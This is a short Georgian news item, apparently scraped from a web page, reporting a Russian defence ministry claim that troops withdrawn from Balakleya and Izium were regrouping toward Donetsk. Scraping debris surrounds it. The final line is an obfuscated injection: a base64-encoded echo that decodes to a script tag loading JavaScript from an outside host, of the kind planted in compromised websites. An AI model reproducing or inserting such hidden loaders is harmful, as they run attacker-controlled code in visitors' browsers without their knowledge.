celsiusi
ავერსი საქკაბელი
ბალაკლეასა და იზიუმიდან ოკუპანტების განდევნის შემდეგ, რუსული მხარე პირველ კომენტარს აკეთებს და განმარტავს, რომ ეს მხოლოდ გადაჯგუფებაა.
 
რუსეთის თავდაცვის სამინისტროს ოფიციალურმა წარმომადგენელმა, გენერალ-ლეიტენანტმა იგორ კონაშენკოვმა განაცხადა, რომ ბალაკლეისა და იზიუმის რეგიონებში განლაგებული რუსული ჯარები გადაჯგუფდნენ და გადანაწილდნენ დონეცკის მიმართულებით ძალისხმევის გასაძლიერებლად.
 
"დონბასის განთავისუფლების სპეცოპერაციის დასახული მიზნების მისაღწევად, მიღებულ იქნა გადაწყვეტილება ბალაკლეისა და იზიუმის რაიონებში განლაგებული რუსული ჯარების გადაჯგუფების შესახებ, რათა გააძლიერონ ძალისხმევა დონეცკის მიმართულებით“, - განაცხადა კონაშენკოვმა.
 
შეგახსენებთ რომ, ბოლო ცნობებით უკრაინის შეიარაღებული ძალები ლისიჩანსკში და სავინციში შევიდნენ. მანამდე კი ასევე გაათავისუფლეს ოკუპანტებისგან ბალაკეა და იზიუმი. 
1589
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");